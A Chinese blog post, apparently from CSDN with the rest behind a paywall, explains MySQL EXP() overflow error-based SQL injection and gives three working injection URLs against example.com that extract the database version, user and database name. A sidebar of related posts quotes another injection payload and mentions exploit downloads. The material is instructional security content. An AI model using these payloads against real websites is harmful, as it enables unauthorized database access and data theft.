【漏洞挖掘】——109、EXP报错注入深入刨析

于 2024-06-21 16:22:09 发布
阅读量43 收藏
点赞数
分类专栏: 【WEB渗透】 文章标签: 安全 web安全 EXP报错注入 报错注入 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/139864066
版权
【WEB渗透】 专栏收录该内容
126 篇文章 5 订阅 ¥29.90 ¥99.00
订阅专栏
EXP函数简介

函数用法:

exp(x)

函数功能:返回e的x次方

用法示例:

EXP报错注入原理

EXP报错注入是一种通过利用溢出错误来注出数据的SQL注入方式,当传递一个大于709的值给exp()函数时,函数会发生一个溢出错误,例如:

EXP报错注入流程

EXP报错注入的目标数据库版本需要在5.5及5.5以上~

获取数据库版本信息
  • http://www.example.com/?id=1' and exp(~(select * from (select version() ) a) ) --+
获取用户名相关信息
  • http://www.example.com/?id=1' and exp(~(select * from (select user() ) a) ) --+
获取数据库名的信息
  • http://www.example.com/?id=1' and exp(~(select * from (select database() ) a) ) --+
获取数据库的表信息

查询第一个表名信息

了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
如何发现高危的PoC和EXP?漏洞检测方法 & 示例,实战应急实战举例,包括:SQLi、XSS、SSTI/ELI、文件哈希、SSRF、命令执行/命令注入等等
代码讲故事
04-11 399
如何发现高危的PoC和EXP?漏洞检测方法 & 示例,实战应急实战举例,包括:SQLi、XSS、SSTI/ELI、文件哈希、SSRF、命令执行/命令注入等等。 在网络安全领域,发现高危的PoC(Proof of Concept)和EXPExploit)对于防范和应对潜在的安全威胁至关重要。以下是关于如何发现高危漏洞、漏洞检测方法、实战应急举例的详细介绍,涵盖了SQL注入(SQLi)、跨站脚本攻击(XSS)、服务器端模板注入(SSTI/ELI)、文件哈希、服务端请求伪造(SSRF)、命令执行/命令注入等多种
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
exp入手分析漏洞
weixin_30810583的博客
07-26 349
分析poc和分析exp有一些不一样,因为exp是人为构造后的东西,它会执行一段自定的shellcode。结果是根本不会触发异常或者异常在离触发点十万八千里的地方。这样分析poc的技巧就用不上了(因为无法有效的定位到漏洞触发的第一现场)。但是可以从exp的功能入手,观察一下exp的行为比如创建文件、创建进程之类的。可以从行为找出关键的API进行下断。 1.分析shellcode的功能,对其中的关键...
什么是EXP漏洞
qq_44833342的博客
05-29 894
EXP漏洞概念
路由器漏洞 EXP 开发实践
hl1293348082的专栏
05-30 1756
测试环境 Debian 9 Qemu 本文主要以 CVE-2013-0230 漏洞为例,讲解路由器上缓冲区漏洞的 exp 编写。 0x01 环境搭建 使用 firmware-analysis-toolkit firmware-analysis-toolkit https://github.com/attify/firmware-analysis-toolkit 是模拟固件和分析安全漏洞的工具。 该工具可以自动的解压固件和创建 image 使用 qemu 来模拟路由器。 在本文
CVE-2019-0708远程桌面服务远程执行代码漏洞exp利用过程
L199714的博客
09-09 251
CVE-2019-0708远程桌面服务远程执行代码漏洞 上边这洞是啥我就不多说了,描述类的自行百度。 受影响系统版本范围: Windows Server 2008 R2 Windows Server 2008 Windows Server 2003(已停止维护) Windows 7 Windows XP(已停止维护) ...
CVE-2018-8120 WIN7 08提权漏洞exp
weixin_34269583的博客
05-20 1005
CVE-2018-8120 WIN7 08提权漏洞exp在虚拟机测试成功影响范围Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 x64.exphttp://liang.o2oxy.cn/wp-content/uploads/2018/05/CVE-2018-8120.zip 转载于:https:...
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
漏洞赏金猎人盗用他人exp获利 .pdf
09-05
然而,随着这种模式的普及,也暴露出一些问题,尤其是关于漏洞赏金猎人盗用他人研究成果(EXP,即Exploit,漏洞利用)来获取赏金的现象。 【漏洞赏金猎人的道德问题】 一些漏洞赏金猎人不遵循道德规范,他们会剽窃...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
常用的报错功能函数包括extractvalue()、updatexml)、floor()、exp()等。 二、extractvalue()函数 extractvalue()函数用于对XML文档进行查询,相当于在HTML文件中用标签查找元素。语法:extractvalue(XML_document...
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
apache 2.2.14漏洞代码和exp
03-31
apache 2.2.14漏洞代码和exp
漏洞原理+靶场环境+exp等.zip
最新发布
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Spring爆远程代码执行漏洞(含EXP
cnbird's blog
07-05 2620
上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。该漏洞被命名为“remote code with Expression Language injection”。他们发现,通过发送特定的Spring标签,可以导致服务器上的敏感数据暴露、执行任意代码等。(PS:该漏洞早在2011年就发现了,只是未对外公布。) 威廉姆
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
L_lemo004的博客
10-20 665
后渗透提权常用漏洞 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [An elevation of privilege vulnerability exists in
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5479
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
齐博CMS变量覆盖漏洞exp
热门推荐
Exploit的小站~
05-10 1万+
 漏洞的具体分析在 http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13,下面公布一下我写的漏洞利用以及exp。 利用步骤如下: (1)首先访问/member下面的“评论管理”功能,抓包 (2)在httprequest中构造一个attachment,如下: POST /qibo/mem...
Discuz交友插件漏洞附EXP
收集盒 Book box
05-29 1192
DZ交友插件漏洞jiaoyou.php?pid=1 有的注入需要登录,注入代码如下: ' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0
linux 漏洞 exp,Linux内核漏洞详情及其Exp
weixin_33504324的博客
05-16 551
文章来源:SecTr安全团队概述本文中详细介绍了Linux内核新引入的io_uring子系统中的UAFCVE-2021-20226。该文件结构释放后重用,可用于在内核中提升权限,影响范围为Linux内核v5.6至v5.7。漏洞详情Linux内核v5.1引入了一个名为io_uring的新异步I/O接口。io_uring通过批处理I/O操作系统调用运行,因此可以在一个系统调用中执行多个I/O操作。Li...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值